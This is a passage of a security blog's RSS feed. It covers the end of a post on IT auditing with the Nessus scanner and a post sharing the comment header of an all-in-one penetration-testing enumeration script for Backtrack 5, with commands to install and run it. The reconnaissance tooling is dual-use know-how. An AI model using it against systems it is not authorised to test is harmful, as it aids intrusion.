&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;SSL certificate&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Host file detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Host services detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Open port detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Vulnerability detection (It suggests the solution too)&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Internal IP address detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;VPN detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Firewall, IDS and IPS detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Proxy detection&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Real time DNS traffic&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Real time web traffic&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;More&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;For
 detection purposes the real weapon of Nessus is SYN packets because 
every operating system uses SYN packets in a unique way so by using the 
SYN packets Nessus discover the host and the services, as in a basic DOS
 attack theory the SYN packets can be used for SYN flooding so an 
auditor must take care these aspect of vulnerability assessment. Your 
test must not be count as a Denial of service attack for a network.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Vulnerability
 monitoring that is used in Nessus vulnerability scanner are CVE (Common
 vulnerability and exposure) and CPE, beside auditing and analyzing 
host, port, services and vulnerability nessus can be used to monitor 
real time activities like:&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit; margin-left: 45pt;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;DNS (DNS lookup analysis)&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Facebook (Log in/ log out, user ID analysis)&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;SMTP (source and sink of an email)&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;SMB&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Twitter (Log in/ log out and other activity analysis)&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Database (SQL,Oracle and other database analysis)&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;More..&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Continuous
 monitoring or real time monitoring reduce the chance of the active 
scanning so as a economical aspect it is a good process and highly 
recommended because active scanning means operation or test on all the 
network from physical layer to application layer and it takes time, 
money, human effort (more engineer required) and the process may slow 
down the network or if the test is not perform carefully than there is 
chance of denial of service.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;As
 we have discussed most of the theorical, economical and technical side 
of this test but before going to the example of test I want to let you 
know about an important side of the picture, let suppose an network 
security auditor/ penetration tester going to conduct a test on a large 
enterprise network keep in mind that these sort of network usually has 
web application server or may be some of the applications are enable for
 web. So in this case web server security monitory is also a necessary 
part and the web applications are the most common victim. That is why I 
choose nessus for vulnerability assessment because it provides an 
effective platform to perform a test on web application as well as 
network.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Nessus has 
designed to check each and every port of a web application and other 
services whether it is an uncommon port, the depth analysis of web 
application provides:&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit; margin-left: 39pt;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Analysis of HTTP and HTTPS services&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Analyze all the website that is host on a server&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Analyze SSL certificate, expiry of SSL certificate and more&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Analyze content for insecure JavaScript that is lead towards the code injection attack&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;span style="color: blue;"&gt;&amp;nbsp;Second part of this series article will be publish!&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-2150252862171803396?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=lyspaWa3iBs:qHwZM1SO9iQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=lyspaWa3iBs:qHwZM1SO9iQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=lyspaWa3iBs:qHwZM1SO9iQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=lyspaWa3iBs:qHwZM1SO9iQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=lyspaWa3iBs:qHwZM1SO9iQ:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/lyspaWa3iBs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/lyspaWa3iBs/it-auditing-fundamentals-theoretical-to.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-hQSU662I794/T3yH4F60oLI/AAAAAAAABGY/MClAKA6i64g/s72-c/assurance-and-audit.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/it-auditing-fundamentals-theoretical-to.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-2633707220993523584</guid><pubDate>Mon, 26 Mar 2012 14:58:00 +0000</pubDate><atom:updated>2012-03-26T07:59:41.582-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Backtrack5</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>Pentest.sh Penetration Testing Script for Backtrack 5</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nt2lCrmCuQKqreXxHzckdgaNtyc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nt2lCrmCuQKqreXxHzckdgaNtyc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nt2lCrmCuQKqreXxHzckdgaNtyc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nt2lCrmCuQKqreXxHzckdgaNtyc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/pentestsh-penetration-testing-script.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-bIVi-8gZe9g/T3CDmFbqWBI/AAAAAAAABE4/Zk0wUGpBPl8/s200/60.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://www.ehacking.net/search/label/Pen-Testing" style="color: blue;" target="_blank"&gt;Penetration testing&lt;/a&gt; and Ethical hacking can be done by manually and automatically, both manual and automatic &lt;a href="http://www.ehacking.net/search/label/Vulnerability" style="color: blue;" target="_blank"&gt;vulnerability&lt;/a&gt; scanning and hacking has their own importance like automatic process save time while manual hacking can find more vulnerabilities and so on. There are so many tools and techniques has been discussed before but in this article I will share a wonderful script written by phillips321 that can make the job of information gathering and enumeration easy.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;The script has been designed for backtrack 5 operating system and it can work on backtrack 5 R1 too, the dependencies and the tools that has been mentioned in the script are :&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; nmap&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; sslscan&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; gnome-web-photo&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; arp-scan&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; dialog&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; onesixtyone&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; amap &lt;/span&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;On your &lt;a href="http://www.ehacking.net/search/label/Backtrack5" style="color: blue;" target="_blank"&gt;backtrack 5&lt;/a&gt; kindly use the terminal to install the dependencies by using&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;&lt;div style="color: #444444;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;blockquote style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;apt-get install sslscan gnome-web-photo arp-scan dialog&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;The script as follows&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;#!/bin/bash&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#__________________________________________________________&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# Author:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; phillips321 contact through phillips321.co.uk&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# License:&amp;nbsp;&amp;nbsp;&amp;nbsp; CC BY-SA 3.0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# Use:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; All in one pentest script designed for bt5&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# Released:&amp;nbsp;&amp;nbsp; www.phillips321.co.uk&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp; version=2.1&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# Dependencies:&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; nmap&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; sslscan&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; gnome-web-photo&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; arp-scan&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; dialog&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; onesixtyone&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; amap&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# backtrack users can apt-get install sslscan gnome-web-photo arp-scan dialog&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;# ToDo:&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; nikto&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; add ability to launch nesssus against targets&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ldapminer: wine ldapminer.exe -d -h ${ip}&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; add nfs connect followed by tree command&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; add snmp test using swaks --to user@example.com --server test-server.example.net&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;#&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; add uniscan http://${ip}:${port}/ | tee ${ip}.${port}.uniscan.txt&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="color: red; font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Get the complete script from &lt;a href="http://code.google.com/p/phillips321/source/browse/trunk/pentest.sh" rel="nofollow" target="_blank"&gt;here&lt;/a&gt;. &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Since it is a bash script so all you need to do is to just copy the script and paste on your text editor "gedit" in backtrack 5 and then save it to whatever.sh&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Open the terminal, locate the directory where you have saved the script before and launch the script, for example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;&lt;div style="color: #444444;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;blockquote style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;root@bt:~/Desktop# sh ehacking.sh&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Share your experience with the script. &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-2633707220993523584?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=UN3TdRUBLN4:lkOpoPsUHKY:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=UN3TdRUBLN4:lkOpoPsUHKY:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=UN3TdRUBLN4:lkOpoPsUHKY:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=UN3TdRUBLN4:lkOpoPsUHKY:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=UN3TdRUBLN4:lkOpoPsUHKY:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
